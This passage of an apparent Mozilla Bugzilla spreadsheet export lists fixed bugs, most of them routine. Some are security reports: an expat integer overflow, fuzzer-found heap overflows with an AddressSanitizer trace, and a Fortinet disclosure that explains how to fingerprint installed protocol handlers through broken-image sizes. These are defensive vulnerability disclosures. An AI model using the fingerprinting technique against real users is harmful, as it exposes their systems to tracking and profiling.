          <t>Home screen</t>
        </is>
      </c>
      <c r="K803" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L803" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M803" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N803" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O803" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P803" t="inlineStr">
        <is>
          <t>[MobileAS][nice-to-have]</t>
        </is>
      </c>
      <c r="Q803" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R803" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S803" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T803" t="n">
        <v>1</v>
      </c>
      <c r="U803" t="n">
        <v>0</v>
      </c>
      <c r="V803" t="n">
        <v>5</v>
      </c>
      <c r="W803" t="inlineStr">
        <is>
          <t>There is this neat collection of popular site icons that Desktop uses for showing higher quality images for highlights/top sites that we can utilize on iOS available here: https://github.com/nchapman/tippy-top-sites. We should detect when we're showing a highlight or top site for one of the available icons and use the image and background color from the tippy-topsite pack instead to provide a better quality result.</t>
        </is>
      </c>
      <c r="X803" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="804">
      <c r="A804" t="n">
        <v>1274777</v>
      </c>
      <c r="B804" t="inlineStr">
        <is>
          <t>2016-05-21 10:53:39 -0700</t>
        </is>
      </c>
      <c r="C804" t="inlineStr">
        <is>
          <t>Possible integer overflow to fix inside XML_Parse in expat</t>
        </is>
      </c>
      <c r="D804" t="inlineStr">
        <is>
          <t>2024-05-30 09:17:27 -0700</t>
        </is>
      </c>
      <c r="E804" t="n">
        <v>1</v>
      </c>
      <c r="F804" t="n">
        <v>1</v>
      </c>
      <c r="G804" t="n">
        <v>3</v>
      </c>
      <c r="H804" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I804" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J804" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K804" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L804" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M804" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N804" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O804" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P804" t="inlineStr">
        <is>
          <t>[adv-main50+] btpp-active</t>
        </is>
      </c>
      <c r="Q804" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R804" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S804" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T804" t="n">
        <v>1</v>
      </c>
      <c r="U804" t="n">
        <v>0</v>
      </c>
      <c r="V804" t="n">
        <v>12</v>
      </c>
      <c r="W804" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0
Build ID: 20160425115534
Steps to reproduce:
Possible integer overflow in XML_Parse:
https://github.com/mozilla/gecko-dev/blob/7b9ea8afc579378606ecf3593b04fc2aaba7daec/parser/expat/lib/xmlparse.c#L1568</t>
        </is>
      </c>
      <c r="X804" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="805">
      <c r="A805" t="n">
        <v>584744</v>
      </c>
      <c r="B805" t="inlineStr">
        <is>
          <t>2010-08-05 09:27:17 -0700</t>
        </is>
      </c>
      <c r="C805" t="inlineStr">
        <is>
          <t>Disable related questions for now</t>
        </is>
      </c>
      <c r="D805" t="inlineStr">
        <is>
          <t>2010-08-05 10:40:10 -0700</t>
        </is>
      </c>
      <c r="E805" t="n">
        <v>1</v>
      </c>
      <c r="F805" t="n">
        <v>1</v>
      </c>
      <c r="G805" t="n">
        <v>5</v>
      </c>
      <c r="H805" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I805" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J805" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K805" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L805" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M805" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N805" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O805" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P805" t="inlineStr"/>
      <c r="Q805" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R805" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S805" t="inlineStr">
        <is>
          <t>2.2.1</t>
        </is>
      </c>
      <c r="T805" t="n">
        <v>1</v>
      </c>
      <c r="U805" t="n">
        <v>0</v>
      </c>
      <c r="V805" t="n">
        <v>3</v>
      </c>
      <c r="W805" t="inlineStr">
        <is>
          <t>Related questions require queries that take down the DB slaves. Until we can find a more efficient way of calculating related questions, we need to disable this feature.</t>
        </is>
      </c>
      <c r="X805" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="806">
      <c r="A806" t="n">
        <v>1063923</v>
      </c>
      <c r="B806" t="inlineStr">
        <is>
          <t>2014-09-06 05:33:40 -0700</t>
        </is>
      </c>
      <c r="C806" t="inlineStr">
        <is>
          <t>A log parser failure should switch the parsing status to "failed"</t>
        </is>
      </c>
      <c r="D806" t="inlineStr">
        <is>
          <t>2014-09-23 15:18:51 -0700</t>
        </is>
      </c>
      <c r="E806" t="n">
        <v>1</v>
      </c>
      <c r="F806" t="n">
        <v>1</v>
      </c>
      <c r="G806" t="n">
        <v>7</v>
      </c>
      <c r="H806" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I806" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J806" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K806" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M806" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N806" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O806" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P806" t="inlineStr"/>
      <c r="Q806" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R806" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S806" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T806" t="n">
        <v>1</v>
      </c>
      <c r="U806" t="n">
        <v>0</v>
      </c>
      <c r="V806" t="n">
        <v>4</v>
      </c>
      <c r="W806" t="inlineStr">
        <is>
          <t>The last Gip job on the "B2G Device Image opt" row here
https://treeherder.allizom.org/ui/#/jobs?repo=b2g-inbound&amp;revision=e5d7e65f7087
has a pending log parsing status even though the log parsing failed.</t>
        </is>
      </c>
      <c r="X806" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="807">
      <c r="A807" t="n">
        <v>1336982</v>
      </c>
      <c r="B807" t="inlineStr">
        <is>
          <t>2017-02-06 06:37:44 -0800</t>
        </is>
      </c>
      <c r="C807" t="inlineStr">
        <is>
          <t>Investigate UITelemetry searchbar position reporting</t>
        </is>
      </c>
      <c r="D807" t="inlineStr">
        <is>
          <t>2017-04-29 04:57:50 -0700</t>
        </is>
      </c>
      <c r="E807" t="n">
        <v>1</v>
      </c>
      <c r="F807" t="n">
        <v>1</v>
      </c>
      <c r="G807" t="n">
        <v>2</v>
      </c>
      <c r="H807" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I807" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J807" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K807" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L807" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M807" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N807" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O807" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P807" t="inlineStr">
        <is>
          <t>[fxsearch]</t>
        </is>
      </c>
      <c r="Q807" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R807" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S807" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T807" t="n">
        <v>1</v>
      </c>
      <c r="U807" t="n">
        <v>0</v>
      </c>
      <c r="V807" t="n">
        <v>8</v>
      </c>
      <c r="W807" t="inlineStr">
        <is>
          <t>During analysis of the Shield study report, some users that should have had the search removed from the toolbars (unified branch) had UITelemetry reporting it being in the default position (or multiple).
We must investigate why this happened, cause it may also be useful for future reference, and we should probably understand it before doing further studies.
This indicates a bug in either:
- The Study add-on
- UITelemetry
- The telemetry collection/analysis
- Interaction of the add-on with something else (another add-on, a specific setting?)
Extract from David Zeber analysis:
"There is a record in Telemetry of whether the searchbar is showing during the subsession. According to that measure, less than half of profiles on the unified branch had the searchbar removed for every subsession during the study. The majority reported the searchbar as being alternatively kept and removed over the course of the study period, and a small percentage of profiles reported the searchbar was kept for every subsession."
"We expect the Awesomebar to always be in the default position, and the searchbar to be in the expected position for all but a small group who may have modified it manually.
    The Awesomebar is in default position for all but a couple of profiles
    The searchbar is as expected for the control and oneoff branches
    The searchbar appears not be getting removed for many on the unified branch"</t>
        </is>
      </c>
      <c r="X807" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="808">
      <c r="A808" t="n">
        <v>1429245</v>
      </c>
      <c r="B808" t="inlineStr">
        <is>
          <t>2018-01-09 15:17:37 -0800</t>
        </is>
      </c>
      <c r="C808" t="inlineStr">
        <is>
          <t>Optimize CommonUtils.bytesAsHex</t>
        </is>
      </c>
      <c r="D808" t="inlineStr">
        <is>
          <t>2018-01-12 08:53:13 -0800</t>
        </is>
      </c>
      <c r="E808" t="n">
        <v>1</v>
      </c>
      <c r="F808" t="n">
        <v>1</v>
      </c>
      <c r="G808" t="n">
        <v>2</v>
      </c>
      <c r="H808" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I808" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J808" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K808" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L808" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M808" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N808" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O808" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P808" t="inlineStr"/>
      <c r="Q808" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R808" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S808" t="inlineStr">
        <is>
          <t>Firefox 59</t>
        </is>
      </c>
      <c r="T808" t="n">
        <v>1</v>
      </c>
      <c r="U808" t="n">
        <v>0</v>
      </c>
      <c r="V808" t="n">
        <v>11</v>
      </c>
      <c r="W808" t="inlineStr">
        <is>
          <t>CommonUtils.bytesAsHex [0] shows up on profiles and could be faster [1] if we changed the algorithm to concatenate the hex values to a string directly instead of using a intermediate array.
[0] https://searchfox.org/mozilla-central/rev/03877052c151a8f062eea177f684a2743cd7b1d5/services/common/utils.js#216
[1] https://jsperf.com/bytesashex</t>
        </is>
      </c>
      <c r="X808" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="809">
      <c r="A809" t="n">
        <v>1248805</v>
      </c>
      <c r="B809" t="inlineStr">
        <is>
          <t>2016-02-16 15:56:05 -0800</t>
        </is>
      </c>
      <c r="C809" t="inlineStr">
        <is>
          <t>graphite2: heap-buffer-overflow read in [@graphite2::GlyphCache::Loader::Loader]</t>
        </is>
      </c>
      <c r="D809" t="inlineStr">
        <is>
          <t>2016-09-22 14:48:01 -0700</t>
        </is>
      </c>
      <c r="E809" t="n">
        <v>1</v>
      </c>
      <c r="F809" t="n">
        <v>1</v>
      </c>
      <c r="G809" t="n">
        <v>3</v>
      </c>
      <c r="H809" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I809" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J809" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K809" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L809" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M809" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N809" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O809" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P809" t="inlineStr">
        <is>
          <t>[adv-main45+][adv-esr38.7+]</t>
        </is>
      </c>
      <c r="Q809" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R809" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S809" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T809" t="n">
        <v>1</v>
      </c>
      <c r="U809" t="n">
        <v>0</v>
      </c>
      <c r="V809" t="n">
        <v>6</v>
      </c>
      <c r="W809" t="inlineStr">
        <is>
          <t>Created attachment 8720040
call_stack.txt
This was found while fuzzing graphite2 revision a8f9210571f5339d55c7fd4524acb64ce5ca8fd8.</t>
        </is>
      </c>
      <c r="X809" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="810">
      <c r="A810" t="n">
        <v>1658881</v>
      </c>
      <c r="B810" t="inlineStr">
        <is>
          <t>2020-08-13 00:56:13 -0700</t>
        </is>
      </c>
      <c r="C810" t="inlineStr">
        <is>
          <t>[VG-VD-20-115] Leaking External URL protocol handler presence through image tags</t>
        </is>
      </c>
      <c r="D810" t="inlineStr">
        <is>
          <t>2024-05-30 10:17:58 -0700</t>
        </is>
      </c>
      <c r="E810" t="n">
        <v>1</v>
      </c>
      <c r="F810" t="n">
        <v>1</v>
      </c>
      <c r="G810" t="n">
        <v>3</v>
      </c>
      <c r="H810" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I810" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J810" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K810" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L810" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M810" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N810" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O810" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P810" t="inlineStr">
        <is>
          <t>[fingerprinting][reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main82+]</t>
        </is>
      </c>
      <c r="Q810" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R810" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S810" t="inlineStr">
        <is>
          <t>82 Branch</t>
        </is>
      </c>
      <c r="T810" t="n">
        <v>1</v>
      </c>
      <c r="U810" t="n">
        <v>0</v>
      </c>
      <c r="V810" t="n">
        <v>23</v>
      </c>
      <c r="W810" t="inlineStr">
        <is>
          <t>Created attachment 9169778
ff.html
Dear Mozilla,
Fortinet's FortiGuard Labs have discovered a security issue in your product Firefox on 8/12/2020. We estimate its risk level is 2, on a scale of 1 (lowest) to 5 (highest), in terms of its impact. Please advise of the appropriate contact person in your company to handle this issue.
Fortinet's research remains ethical at all times, and we therefore strive to Responsible Disclosure. Fortinet vulnerability disclosure policy can be found at https://fortiguard.com/zeroday/responsible-disclosure.
For this particular issue, we will wait until 9/13/2020 for vendor response before we post an advisory on our website (https://fortiguard.com/zeroday) and/or any other publication form (e.g. conference talk, demo, podcast, etc.).
In the case you agree to patch this issue, we'll extend the disclosure deadline to 90 days (it's 11/13/2020  for this issue) automatically.
We might disclose it *earlier* than that date only if:
1)	Public proof of concept code for the vulnerability is released or it's disclosed by other people, increasing the danger of the vulnerability being exploited in the wild;
2)	Active attack against the vulnerability is detected;
3)	Or you have patched the vulnerability or released solution/workaround - a positive fact we'll be happy to mention.
Fortinet will use reasonable efforts to communicate a schedule of planned mediums, including conferences with the appropriate stakeholders within the affected company.
Our security researchers work on your product or service either because it is popular and/or interesting, so please take this positively. This research is done free of charge for you, although our researchers will appreciate being mentioned in a Hall of Fame or bug bounty if any. Threats to our security researchers are not acceptable and will be dealt with by our Legal team.
We look forward to working closely with you to resolve this issue. If you wish to switch to confidential emails, our PGP key can be found at https://fortiguard.com/secresearch-pgpkey.
Kind regards,
Fortinet's FortiGuard Labs.
Vulnerability Description:
-----------------------------
This vulnerability has been tested on Firefox 78.0.1 (64-bit) under Windows 10. To leak the protocol handlers in Firefox, we leverage differences in the way Firefox renders images sourced from existing and non-existing protocol handlers.
For example, if we try to load a web page containing the following element - 
&lt;img src=”search-ms://abc”&gt;
and observe the elements styling using developer tools, we would see that the default styling for broken images generates element with size of 24x24. Unlike the example above, if we try to create an image element and set source to some non-existent handler like the following - 
&lt;img src=”NonExistingHandler://abc”&gt;
this will result with an element with different sizing of 0x0.
This difference can be measured using a simple JS script. Basing on this, a malicious actor may perform a brute-force attack to disclose the different protocol handlers on a targeted system.
please note that the ff.html file contains the PoC for this vulnerability.
Thanks,
Rotem Kerner</t>
        </is>
      </c>
      <c r="X810" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="811">
      <c r="A811" t="n">
        <v>1412170</v>
      </c>
      <c r="B811" t="inlineStr">
        <is>
          <t>2017-10-26 19:12:23 -0700</t>
        </is>
      </c>
      <c r="C811" t="inlineStr">
        <is>
          <t>Integrate WebExtension page action context menus with the Photon page action context menu</t>
        </is>
      </c>
      <c r="D811" t="inlineStr">
        <is>
          <t>2018-02-06 11:13:13 -0800</t>
        </is>
      </c>
      <c r="E811" t="n">
        <v>1</v>
      </c>
      <c r="F811" t="n">
        <v>1</v>
      </c>
      <c r="G811" t="n">
        <v>2</v>
      </c>
      <c r="H811" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I811" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J811" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K811" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L811" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M811" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N811" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O811" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P811" t="inlineStr">
        <is>
          <t>[reserve-photon-structure]</t>
        </is>
      </c>
      <c r="Q811" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R811" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S811" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T811" t="n">
        <v>1</v>
      </c>
      <c r="U811" t="n">
        <v>0</v>
      </c>
      <c r="V811" t="n">
        <v>26</v>
      </c>
      <c r="W811" t="inlineStr">
        <is>
          <t>Bug 1395387 is the main bug that reconciles WebExtension page actions and Photon page actions, but we left context menus as a follow-up, and that's this bug.
Aaron, do you have any thoughts on how to integrate an extension's context menu with our current "Add/Remove from Address Bar" context menu on page actions?  I'm thinking just appending a separator and then our "Add/Remove" item, like:
Extension menu menu item 1
Extension menu menu item 2
...
Extension menu menu item n
---------------------------
Add/Remove from Address Bar</t>
        </is>
      </c>
      <c r="X811" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="812">
      <c r="A812" t="n">
        <v>1268539</v>
      </c>
      <c r="B812" t="inlineStr">
        <is>
          <t>2016-04-28 08:55:13 -0700</t>
        </is>
      </c>
      <c r="C812" t="inlineStr">
        <is>
          <t>Implement basic scripts to help Loop releases</t>
        </is>
      </c>
      <c r="D812" t="inlineStr">
        <is>
          <t>2016-06-23 01:45:59 -0700</t>
        </is>
      </c>
      <c r="E812" t="n">
        <v>1</v>
      </c>
      <c r="F812" t="n">
        <v>1</v>
      </c>
      <c r="G812" t="n">
        <v>6</v>
      </c>
      <c r="H812" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I812" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J812" t="inlineStr">
        <is>
          <t>Client</t>
        </is>
      </c>
      <c r="K812" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L812" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M812" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N812" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O812" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P812" t="inlineStr"/>
      <c r="Q812" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R812" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S812" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T812" t="n">
        <v>1</v>
      </c>
      <c r="U812" t="n">
        <v>0</v>
      </c>
      <c r="V812" t="n">
        <v>5</v>
      </c>
      <c r="W812" t="inlineStr">
        <is>
          <t>I'm writing some basic scripts for aiding releases - basically automation for complete segments, e.g. filing bugs for standalone or doing an export to mozilla-central and filing a bug.
This should make it a lot simpler for other people to do various parts of the releases.</t>
        </is>
      </c>
      <c r="X812" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="813">
      <c r="A813" t="n">
        <v>1536133</v>
      </c>
      <c r="B813" t="inlineStr">
        <is>
          <t>2019-03-18 09:18:25 -0700</t>
        </is>
      </c>
      <c r="C813" t="inlineStr">
        <is>
          <t>Figure out  the right solution for sync telemetry on Fenix</t>
        </is>
      </c>
      <c r="D813" t="inlineStr">
        <is>
          <t>2019-04-16 11:23:17 -0700</t>
        </is>
      </c>
      <c r="E813" t="n">
        <v>1</v>
      </c>
      <c r="F813" t="n">
        <v>1</v>
      </c>
      <c r="G813" t="n">
        <v>5</v>
      </c>
      <c r="H813" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I813" t="inlineStr">
        <is>
          <t>Data Science</t>
        </is>
      </c>
      <c r="J813" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K813" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L813" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M813" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N813" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O813" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P813" t="inlineStr"/>
      <c r="Q813" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R813" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S813" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T813" t="n">
        <v>1</v>
      </c>
      <c r="U813" t="n">
        <v>0</v>
      </c>
      <c r="V813" t="n">
        <v>8</v>
      </c>
      <c r="W813" t="inlineStr">
        <is>
          <t>Requested by Alex Davis
Copied with slight modifications from an email:
:markh is looking into Sync telemetry for Fenix. We want to make sure that what we're shipping is working as expected. Please help him identify the best path forward.
Things that come to mind:
- Do we still need our own ping?
- How does this fit with the new telemetry component (Glean)?
- Is there anything we should consider with the upcoming ecosystem telemetry?
- What questions will we want to answer and what data will we capture to answer them?
Thanks for your help.
Leif Additionally Notes:
[Alessio led an initial meeting about this](https://docs.google.com/document/d/11iaUhwBI7c6PWZFPu9mQx-B2knGlJPIFpaAHmNOQGVg/edit). Three possible ways forward were identified
Alternative 1, probably best option in the long run but more work now: port the ping entirely to glean. The work needed to do so is non-trivial and the AS team already has their plate full. The ping's json payload is currently generated within the sync rust framework and would need to be handed over to glean somehow (and possibly restructured as well to fit its format).
Alternative 2, least amount of short-term work: make the sync rust component POST the ping directly to the aws pipeline where it would pass thru the current sync scala code to end up in the existing sync datasets. This would bypass the use of glean completely for the time being.
Alternative 3 is a hybrid of 1 and 2: critical pieces of the sync ping, such as basic counts of records uploaded, applied, etc are handed over to glean while the full sync payload is POSTed to the "legacy" sync pipeline.
Next step is to decide which one to go with.</t>
        </is>
      </c>
      <c r="X813" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="814">
      <c r="A814" t="n">
        <v>1864118</v>
      </c>
      <c r="B814" t="inlineStr">
        <is>
          <t>2023-11-10 00:05:47 -0800</t>
        </is>
      </c>
      <c r="C814" t="inlineStr">
        <is>
          <t>heap-buffer-overflow widget/windows/nsWindow.cpp:8197 in nsWindow::PickerOpen(void) in headless mode</t>
        </is>
      </c>
      <c r="D814" t="inlineStr">
        <is>
          <t>2024-05-30 11:15:49 -0700</t>
        </is>
      </c>
      <c r="E814" t="n">
        <v>1</v>
      </c>
      <c r="F814" t="n">
        <v>1</v>
      </c>
      <c r="G814" t="n">
        <v>3</v>
      </c>
      <c r="H814" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I814" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J814" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K814" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M814" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N814" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O814" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P814" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main121+][adv-esr115.6+]</t>
        </is>
      </c>
      <c r="Q814" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R814" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S814" t="inlineStr">
        <is>
          <t>122 Branch</t>
        </is>
      </c>
      <c r="T814" t="n">
        <v>1</v>
      </c>
      <c r="U814" t="n">
        <v>0</v>
      </c>
      <c r="V814" t="n">
        <v>26</v>
      </c>
      <c r="W814" t="inlineStr">
        <is>
          <t>Created attachment 9362965
poc.html
#Reproduce
OS:win X64
121.0a1 (2023-11-06) (64-bit)
1. python -m http.server 1337
2. python -m ffpuppet firefox --headless -p prefs.js -d -u http://localhost:1337/poc.html
#Analysis
Not yet
#ASAN
```
==36900==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x12959aa2c548 at pc 0x7ffdb43a10c9 bp 0x00b1a35fc010 sp 0x00b1a35fc058
READ of size 4 at 0x12959aa2c548 thread T0
    #0 0x7ffdb43a10c8 in nsWindow::PickerOpen(void) /builds/worker/checkouts/gecko/widget/windows/nsWindow.cpp:8197
    #1 0x7ffdb41fe18d in AutoWidgetPickerState::PickerState /builds/worker/checkouts/gecko/widget/windows/nsFilePicker.cpp:68
    #2 0x7ffdb41fe18d in AutoWidgetPickerState::AutoWidgetPickerState /builds/worker/checkouts/gecko/widget/windows/nsFilePicker.cpp:59
    #3 0x7ffdb41fe18d in nsFilePicker::ShowFilePicker(class nsTString&lt;char16_t&gt; const &amp;) /builds/worker/checkouts/gecko/widget/windows/nsFilePicker.cpp:490
    #4 0x7ffdb420128c in nsFilePicker::ShowW(enum nsIFilePicker::ResultCode *) /builds/worker/checkouts/gecko/widget/windows/nsFilePicker.cpp:566
    #5 0x7ffdb40d368b in nsBaseFilePicker::AsyncShowFilePicker::Run(void) /builds/worker/checkouts/gecko/widget/nsBaseFilePicker.cpp:86
    #6 0x7ffdaa3057ce in mozilla::RunnableTask::Run(void) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:549
